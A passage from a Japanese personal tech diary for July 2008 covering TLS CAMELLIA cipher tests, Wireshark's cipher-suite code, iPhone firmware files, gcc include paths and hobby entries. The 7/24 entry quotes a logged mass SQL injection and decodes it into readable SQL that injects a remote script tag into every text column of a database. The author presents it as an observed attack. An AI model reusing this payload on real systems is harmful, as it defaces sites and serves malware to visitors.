yG29xagb1o7Gj2KRgpVYcmdx6tHd2JkFW5BcFVfWXL42PV4rf9ziYon8jWsbK2aE
+L6hCtcbxdbHOGZdSIWZJwc/1Vs70S/7ImW+Zds8YEFiAwIDAQABo24wbDAbBgNV
HREEFDASgRB3d3dAc25ha2VvaWwuZG9tMDoGCWCGSAGG+EIBDQQtFittb2Rfc3Ns
IGdlbmVyYXRlZCBjdXN0b20gc2VydmVyIGNlcnRpZmljYXRlMBEGCWCGSAGG+EIB
AQQEAwIGQDANBgkqhkiG9w0BAQQFAAOBgQB6MRsYGTXUR53/nTkRDQlBdgCcnhy3
hErfmPNl/Or5jWOmuufeIXqCvM6dK7kW/KBboui4pffIKUVafLUMdARVV6BpIGMI
5LmVFK3sgwuJ01v/90hCt4kTWoT8YHbBLtQh7PzWgJoBAY7MJmjSguYCRt91sU4K
s0dfWsdItkw4uQ==
-----END CERTIFICATE-----
subject=/C=XY/ST=Snake Desert/L=Snake Town/O=Snake Oil, Ltd/OU=Webserver Team/C
N=www.snakeoil.dom/emailAddress=www@snakeoil.dom
issuer=/C=XY/ST=Snake Desert/L=Snake Town/O=Snake Oil, Ltd/OU=Certificate Autho
rity/CN=Snake Oil CA/emailAddress=ca@snakeoil.dom
---
No client certificate CA names sent
---
SSL handshake has read 1390 bytes and written 265 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-CAMELLIA256-SHA
Server public key is 1024 bit
Compression: NONE
Expansion: NONE
SSL-Session:
Protocol : TLSv1
Cipher : DHE-RSA-CAMELLIA256-SHA
Session-ID: BDF60DA4AFFF73A711D6F0544AB1D3BA122C3939FEE8DBC010B14D9F49CD1F9
7
Session-ID-ctx:
Master-Key: ED6D1A73738505C4ABF42A0AC996F7FCE1675EB52C79ECBDC2782B46E9609FB
21AFF3D0511249AA02851499B70DA9A53
Key-Arg : None
Krb5 Principal: None
Start Time: 1215498128
Timeout : 300 (sec)
Verify return code: 21 (unable to verify the first certificate)
---
GET /
<html></html>closed
なんか、妙に感動。curl でも試してみた。
[toyota@dstar]% setenv LD_LIBRARY_PATH /home/toyota/lib:/usr/lib
[toyota@dstar]% curl -k --ciphers 'CAMELLIA' https://localhost/index.html
<html></html>
良い感じである。
■ 7/10
https での CAMELLIA 暗号を使った通信、wireshark では解読してくれない。
もちろん、DH 系は無理として、CAMELLIA128-SHA / CAMELLIA256-SHA の2つは
解読してくれても良いはずである。試しに、ssldump をゴニョゴニョいじって
make し直したものは、解読できた。ちょっと wireshark の source の判定部分
epan/dissectors/packet-ssl-utils.c を見てみると。
/* look in openssl/ssl/ssl_lib.c for a complete list of available cipersuite*/
static SslCipherSuite cipher_suites[]={
{1,KEX_RSA,SIG_RSA,ENC_NULL,0,0,0,DIG_MD5,16,0, SSL_CIPHER_MODE_STREAM},
{2,KEX_RSA,SIG_RSA,ENC_NULL,0,0,0,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM},
{3,KEX_RSA,SIG_RSA,ENC_RC4,1,128,40,DIG_MD5,16,1, SSL_CIPHER_MODE_STREAM},
{4,KEX_RSA,SIG_RSA,ENC_RC4,1,128,128,DIG_MD5,16,0, SSL_CIPHER_MODE_STREAM},
{5,KEX_RSA,SIG_RSA,ENC_RC4,1,128,128,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM},
{6,KEX_RSA,SIG_RSA,ENC_RC2,8,128,40,DIG_SHA,20,1, SSL_CIPHER_MODE_STREAM},
{7,KEX_RSA,SIG_RSA,ENC_IDEA,8,128,128,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM},
{8,KEX_RSA,SIG_RSA,ENC_DES,8,64,40,DIG_SHA,20,1, SSL_CIPHER_MODE_CBC},
{9,KEX_RSA,SIG_RSA,ENC_DES,8,64,64,DIG_SHA,20,0, SSL_CIPHER_MODE_CBC},
{10,KEX_RSA,SIG_RSA,ENC_3DES,8,192,192,DIG_SHA,20,0, SSL_CIPHER_MODE_CBC},
{11,KEX_DH,SIG_DSS,ENC_DES,8,64,40,DIG_SHA,20,1, SSL_CIPHER_MODE_STREAM},
{12,KEX_DH,SIG_DSS,ENC_DES,8,64,64,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM},
{13,KEX_DH,SIG_DSS,ENC_3DES,8,192,192,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM},
{14,KEX_DH,SIG_RSA,ENC_DES,8,64,40,DIG_SHA,20,1, SSL_CIPHER_MODE_STREAM},
{15,KEX_DH,SIG_RSA,ENC_DES,8,64,64,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM},
{16,KEX_DH,SIG_RSA,ENC_3DES,8,192,192,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM},
{17,KEX_DH,SIG_DSS,ENC_DES,8,64,40,DIG_SHA,20,1, SSL_CIPHER_MODE_STREAM},
{18,KEX_DH,SIG_DSS,ENC_DES,8,64,64,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM},
{19,KEX_DH,SIG_DSS,ENC_3DES,8,192,192,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM},
{20,KEX_DH,SIG_RSA,ENC_DES,8,64,40,DIG_SHA,20,1, SSL_CIPHER_MODE_STREAM},
{21,KEX_DH,SIG_RSA,ENC_DES,8,64,64,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM},
{22,KEX_DH,SIG_RSA,ENC_3DES,8,192,192,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM},
{23,KEX_DH,SIG_NONE,ENC_RC4,1,128,40,DIG_MD5,16,1, SSL_CIPHER_MODE_STREAM},
{24,KEX_DH,SIG_NONE,ENC_RC4,1,128,128,DIG_MD5,16,0, SSL_CIPHER_MODE_STREAM},
{25,KEX_DH,SIG_NONE,ENC_DES,8,64,40,DIG_MD5,16,1, SSL_CIPHER_MODE_STREAM},
{26,KEX_DH,SIG_NONE,ENC_DES,8,64,64,DIG_MD5,16,0, SSL_CIPHER_MODE_STREAM},
{27,KEX_DH,SIG_NONE,ENC_3DES,8,192,192,DIG_MD5,16,0, SSL_CIPHER_MODE_STREAM},
{47,KEX_RSA,SIG_RSA,ENC_AES,16,128,128,DIG_SHA,20,0, SSL_CIPHER_MODE_CBC},
{53,KEX_RSA,SIG_RSA,ENC_AES256,16,256,256,DIG_SHA,20,0, SSL_CIPHER_MODE_CBC},
{96,KEX_RSA,SIG_RSA,ENC_RC4,1,128,56,DIG_MD5,16,1, SSL_CIPHER_MODE_STREAM},
{97,KEX_RSA,SIG_RSA,ENC_RC2,1,128,56,DIG_MD5,16,1, SSL_CIPHER_MODE_STREAM},
{98,KEX_RSA,SIG_RSA,ENC_DES,8,64,64,DIG_SHA,20,1, SSL_CIPHER_MODE_STREAM},
{99,KEX_DH,SIG_DSS,ENC_DES,8,64,64,DIG_SHA,16,1, SSL_CIPHER_MODE_STREAM},
{100,KEX_RSA,SIG_RSA,ENC_RC4,1,128,56,DIG_SHA,20,1, SSL_CIPHER_MODE_STREAM},
{101,KEX_DH,SIG_DSS,ENC_RC4,1,128,56,DIG_SHA,20,1, SSL_CIPHER_MODE_STREAM},
{102,KEX_DH,SIG_DSS,ENC_RC4,1,128,128,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM},
{-1, 0,0,0,0,0,0,0,0,0, 0}
};
#define MAX_BLOCK_SIZE 16
#define MAX_KEY_SIZE 32
int
ssl_find_cipher(int num,SslCipherSuite* cs)
{
SslCipherSuite *c;
for(c=cipher_suites;c->number!=-1;c++){
if(c->number==num){
*cs=*c;
return 0;
}
}
return -1;
}
な感じである。KEX_DH は解読できないので、実質、
1 0x0001 TLS_RSA_WITH_NULL_MD5
2 0x0002 TLS_RSA_WITH_NULL_SHA
3 0x0003 TLS_RSA_EXPORT_WITH_RC4_40_MD5
4 0x0004 TLS_RSA_WITH_RC4_128_MD5
5 0x0005 TLS_RSA_WITH_RC4_128_SHA
6 0x0006 TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5
7 0x0007 TLS_RSA_WITH_IDEA_CBC_SHA
8 0x0008 TLS_RSA_EXPORT_WITH_DES40_CBC_SHA
9 0x0009 TLS_RSA_WITH_DES_CBC_SHA
10 0x000a TLS_RSA_WITH_3DES_EDE_CBC_SHA
47 0x002f TLS_RSA_WITH_AES_128_CBC_SHA
53 0x0035 TLS_RSA_WITH_AES_256_CBC_SHA
96 0x0060 TLS_RSA_EXPORT1024_WITH_RC4_56_MD5
97 0x0061 TLS_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5
98 0x0062 TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
100 0x0064 TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
の 16 cipher しかない。この source 部分をいじれば CAMELLIA 対応になるか、
というとそうでもなく、based on GNUTLS なので、GNUTLS から CAMELLIA 対応に
して、作り直しになる。GNUTLS の source を見てないのでなんとも言えないけど
CAMELLIA は対応しているようなので、解読はできるのだろうけど、ひょっとしたら
based on libgcrypt なので、libgcrypt からコンパイルのし直しかもしれない。
と考えると気が遠くなってきたので、wireshark の作り直しなんて考えるのは
やめよう。
■ 7/11
ssldump 用 AES/CAMELLIA/SEED 対応 patch を作ってみた。まとめのページも
書き換えないと。
■ 7/12
バイクのリアサスペンションの袋ナットが欠落していた。ま、それでも違和感を
感じつつ帰ってこれたのだけど。で、ホームセンターに行って、同じ大きさの
袋ナットを買ったのだけど…。家に帰って入れてみたらうまく入らない。どうやら
ピッチが合わないようである。バイクの M10 以上は...なんて思い出した。多分、
ホームセンターで買ってきたのは 1.5 ピッチ、バイクのは 1.25 ピッチなんで
しょう。仕方なく、純正部品を注文しに行く。ゴミになろうとしている 88円の
袋ナットの画期的な使い方を発明しなければ。
■ 7/13
一般の人は、Yahoo の web メールなんかが接続元の IP をメールヘッダに付ける
ことを知らないようで。どこからアクセスしたのか知らせると、気持ち悪がられ
たりして。まぁ、無知というのも問題だけど、危険性を知らせていないことも
問題なんだろうなぁ、なんて思う。探せばどこかに書いてあるかもしれないけど。
■ 7/14
https での TLS 1.1 のプロトコルの確認をしたいのだけど、対応しているサーバが
ない。https://gmail.com/ とか https://www.yahoo.co.jp/ とか接続して試して
みたけど、TLS 1.1 どころか TLS 1.0 さえ対応していない。手元の Apache で、
TLS 1.0 の確認はできたのだけど、TLS 1.1 は世の中的にまだまだ先の話のようで
ある。
■ 7/15
世の中 iPhone で騒がれているようで。ちょっと調べてたら、ファームウェアが
ダウンロードできるみたいで、早速ダウンロードしてみた。それにしても、225M
もあるなんて。そもそもこのファームも、微妙に公式じゃないみたいで、設定を
初期状態に戻すと 5A345 から 5A347 になる 5A347 の方。このファイル、zip で
圧縮されていて、解凍したファイルの日付を見ると、6/26 になっているので、
次のロットからは標準でこのバージョンになるんじゃないかな。とりあえず、
中身は。
[toyota@zonama]% tree
.
|-- 018-3782-2.dmg
|-- 018-3783-2.dmg
|-- Firmware
| |-- all_flash
| | |-- all_flash.m68ap.production
| | | |-- DeviceTree.m68ap.img3
| | | |-- LLB.m68ap.RELEASE.img3
| | | |-- applelogo.s5l8900x.img3
| | | |-- batterylow0.s5l8900x.img3
| | | |-- batterylow1.s5l8900x.img3
| | | |-- glyphcharging.s5l8900x.img3
| | | |-- glyphplugin.s5l8900x.img3
| | | |-- iBoot.m68ap.RELEASE.img3
| | | |-- manifest
| | | |-- needservice.s5l8900x.img3
| | | `-- recoverymode.s5l8900x.img3
| | `-- all_flash.n82ap.production
| | |-- DeviceTree.n82ap.img3
| | |-- LLB.n82ap.RELEASE.img3
| | |-- applelogo.s5l8900x.img3
| | |-- batterylow0.s5l8900x.img3
| | |-- batterylow1.s5l8900x.img3
| | |-- glyphcharging.s5l8900x.img3
| | |-- glyphplugin.s5l8900x.img3
| | |-- iBoot.n82ap.RELEASE.img3
| | |-- manifest
| | |-- needservice.s5l8900x.img3
| | `-- recoverymode.s5l8900x.img3
| `-- dfu
| |-- WTF.m68ap.RELEASE.dfu
| |-- WTF.n82ap.RELEASE.dfu
| |-- WTF.s5l8900xall.RELEASE.dfu
| |-- iBEC.m68ap.RELEASE.dfu
| |-- iBEC.n82ap.RELEASE.dfu
| |-- iBSS.m68ap.RELEASE.dfu
| `-- iBSS.n82ap.RELEASE.dfu
|-- Restore.plist
`-- kernelcache.release.s5l8900x
5 directories, 33 files
■ 7/16
昨日の続き。ファイルの中身やファイル名に散見される S5L8900 というのは、
Samsung 社製のアプリケーションプロセッサの名前で、コアは ARM1176JZF-S と
なっているらしい。ファイルの中身を見る限り、液晶は
SHARP
TMD
SAMSUNG
AUO
の4つ対応している。実際に採用されているのは、どこのかは知らないけど。
なんだか、頑張ればファームの書き換えぐらい出来そうな気がしてきた。それは
すごいスキルをもったマニアに譲るけど。実機もってないし。
■ 7/17
iPhone 3G の HTTP ヘッダを見てみた。
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; ja-jp) App
leWebKit/525.18.1 (KHTML, like.Gecko) Version/3.1.1 Mobile/5A345 Safari/525.20
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/pla
in;q=0.8,image/png,*/*;q=0.5
Accept-Language: ja-jp
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: www.tatsuyoshi.net
固体識別番号の類は一切無し。このシンプルさは好きな方だけど、解析する方の
立場だと、何か送って欲しいものである。
■ 7/18
Segmentation Fault しているプログラムがあって、core ファイルを見ながら
デバッグ。ポインタを多用していると、呼び出し元の関数内の変数を見ても、
呼び出している時点のものではないので、やっぱり動かしながらのデバッグの
方がずっと楽だなぁ、なんて思う。もうしばらく格闘しないと、解決しそうに
ない。ちょっと気が重い。
■ 7/19
先週大きさを間違えて買った袋ナット。バイク屋に頼んでいたのが来ていたので
取りに行き、早速取り付け。ついでに、各所のネジの緩みを確認。キャリア周りで
ちょくちょく緩んでいたので、これで安心して走ることができる。この作業を、
先月買った KTC の MCK317 の工具セットで行った。工具自体は問題ないけど、
10mm のヘキサゴンと、19mm の六角ナットを回せるソケットかレンチがあれば
完璧かな、と思った。
■ 7/20
リトルエンディアンの文字列を、並び替えたい。それも、vi で。
0x1234abcd
を、cdab3412 にしたい。とりあえず、面倒そうな 0x は削除。
:%s/^0x//
で、並び替え。perl だと $1 とかを使うんだけど、色々試してみて、こうなった。
:%s/^\([0-9a-f][0-9a-f]\)\([0-9a-f][0-9a-f]\)\([0-9a-f][0-9a-f]\)\([0-9a-f][0-9
a-f]\)$/\4\3\2\1/
長いので2行にしたけど、こんな感じでうまくいった。vi も慣れれば使えるな、
と思った。
■ 7/21
PC の電源を1日中入れっぱなしなのだけど、この暑さの中、昼は結構な感じで
ケースファンが回っていることに気がついた。平日はさらに窓を閉め切っている
ので、温度があがっているだろうし。帰ってブラウザを立ち上げなおしたり、
書きかけの文書が残っていたりしているので、つけっぱなしなのだけど、この
ご時勢なんで、こまめに電源を落とすようにしようかな。
■ 7/22
Segmentation Fault しているプログラムのデバッグ。こんなときは、やっぱり
アセンブラをきちんとやっておけば良かったと思う。レジスタとか、スタックとか
ちゃんと理解できれば、少しは楽なんだろうなぁ…。
■ 7/23
ちょっと Apache 周りのモジュールをいじっていたりするのだけど、Red Hat 7.2
とか、20世紀の Apache とか、使われている所では使われているもんなんだな、
なんて思いながら、対応したりして。ま、それだけ安定している、ということ
なのだろうけど、これだけ古いと、shell script で変なコマンド叩けないよなぁ。
pgrep とかあるのかわからないし。
■ 7/24
おかしなアクセスがやってきた。改行を入れているけど。
210.245.51.207 - - [24/Jul/2008:06:13:37 +0900] "GET /toyota/router/?;DECLARE%2
0@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766172636861722832353529
2C40432076617263686172283430303029204445434C415245205461626C655F437572736F72204
35552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D20737973
6F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E6964206
16E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E787479
70653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F504
54E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F43
7572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302
920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B
275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D2268747
4703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727
20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637
2697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F73
63726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F43757
2736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F722044
45414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/
1.0" 200 8044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
送信元はベトナムっぽい。ASCII に直してみた。
DECLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECL
ARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 o
r b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE
(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></titl
e><script src="http://abc.verynx.cn/w.js"></script><!--'' where '+@C+' not like
''%"></title><script src="http://abc.verynx.cn/w.js"></script><!--''')FETCH NE
XT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
AS CHAR(4000));EXEC(@S);
流行の SQL インジェクションみたい。http://abc.verynx.cn/w.js というファイルを
取りに行っているようなのだけど、abc.verynx.cn を lookup すると 127.0.0.1 が
返ってくる。
Name: abc.verynx.cn
Address: 127.0.0.1
誰か気がついて DNS 変えられたのかな。
■ 7/25
久しぶりに、というか2年ぶり近くで、トップページの更新をしてみた。ここの
ところ、全く BBルータ解剖 を行っていないなぁ。m/c なページも更新してないし。
Dovecot の翻訳も止まって、なんだか中途半端な状態だなぁ。少しずつ、なんとか
していこう。
■ 7/26
六会コンクリートの話題、全然ニュースで見かけないので、調べてみることに
した。というか、実家のマンションが、距離的に六会コンクリートから30分以内の
場所にあるので、心配なだけ。で、ポップアウト現象とか、骨材のことを色々
調べていたのだけど、国土交通省の反応も遅いし、親会社の住友大阪セメントの
対応も「当社に法的責任はない」とかだし。なんだかなぁ、という状況である。
建築業界の不祥事って、報道が小さいところからして、どこからか大きな力が
働いているのでしょう。
■ 7/27
どこでもベープ蚊取り、の電池(薬剤も?)が切れたようなので、交換した。ついでに
分解して写真にとったので、別ページに。フマキラーの電池は、初めて見た。
■ 7/28
Dovecot 1.1.2 がリリースされていたことをすっかり見落としていた。とりあえず、
Dovecot のページの更新をした。実は dovecot.conf の翻訳もしていて、半分ほど
終わっているので、近々アップする予定。
■ 7/29
dovecot 1.1.2 の dovecot-example.conf の翻訳をざっくりと終わらせたので、
アップしておいた。1.1.1 からの変更点はほとんど無しなんだけど。
■ 7/30
手元の Linux 環境には openssl が2つ入っている。OS 標準のものと、後から
入れたもの。後から入れたものは /usr/local 以下に入っているので、衝突せずに
動作させられるのだけど、ちょっと気になることが。openssl のライブラリを
使うものをコンパイルするとき、-L/usr/local/lib オプションを付けないと、
[toyota@dstar]% gcc -lssl -o test test.c
ccg8Q6Tn.o(.text+0x8): In function `ssl_test':
test.c:10: undefined reference to `EVP_Cipher'
collect2: ld returned 1 exit status
な感じ。-L/usr/local/lib を付けると、問題なくコンパイルできるのだけど、
あえて古い openssl を使いたい、と。多分、問題は /usr/local/include/openssl
以下を読みに行って、それに対応する /usr/local/lib 以下の libssl.a が必要
なのでしょう。試しに、gcc で -v オプションを付けると。
ignoring nonexistent directory "/usr/i386-redhat-linux/include"
#include "..." search starts here:
#include <...> search starts here:
/usr/local/include
/usr/lib/gcc-lib/i386-redhat-linux/3.2.3/include
/usr/include
End of search list.
と、/usr/include より前に /usr/local/include を読みに行っている。gcc に
-I- オプションを付けて指定しても結果が同じだったので、-nostdinc を付けて
解決することにした。
[toyota@dstar]% gcc -lssl -nostdinc -I/usr/include -I/usr/lib/gcc-lib/i386-redh
at-linux/3.2.3/include -o test test.c
こんな感じで、なんとかおさまった。gcc が勝手に /usr/local/include を読みに
行っている設定って、どこかのファイルにあるものなのかなぁ…。
■ 7/31
dovecot 1.1.2 の doc 以下をざっくりと翻訳。やっと、1.1.2 の翻訳が、少し
それらしくなってきた。いつものようにdovecot.jpに。
|